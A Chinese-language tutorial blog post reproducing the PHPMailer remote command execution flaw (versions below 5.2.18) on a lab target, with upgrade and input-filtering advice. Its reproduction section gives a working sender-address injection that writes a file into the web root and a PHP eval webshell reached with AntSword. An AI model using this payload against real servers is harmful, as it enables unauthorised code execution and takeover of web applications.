PHP教程

PHPMailer远程命令执行漏洞复现

本文主要是介绍PHPMailer远程命令执行漏洞复现,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

PHPMailer远程命令执行漏洞复现

漏洞简介:

PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。

PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用。

影响版本:

PHPMailer<5.2.18

环境搭建:

这里采用现成靶机

漏洞复现:

aaa

"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com

<?php @eval($_POST['thelostworld']); ?>  注意:(空格很严格)

发送邮件

 显示发送不成功,其实已经发送成功

访问上传的shell文件,发现上传成功 

 蚁剑进行连接,获得后台

 

 

漏洞防御:

目前此漏洞已经修复,建议及时升级更新至PHPMailer 6.5.0。

下载链接:

https://github.com/PHPMailer/PHPMailer

通用安全建议:

对代码进行安全审计,尽早检测潜在的安全漏洞,并增强代码逻辑性。

对用户的输入进行过滤或转义,避免参数可控。

用户应定期更新软件、程序和应用程序,确保应用程序是最新的,以保护系统免受漏洞利用

这篇关于PHPMailer远程命令执行漏洞复现的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!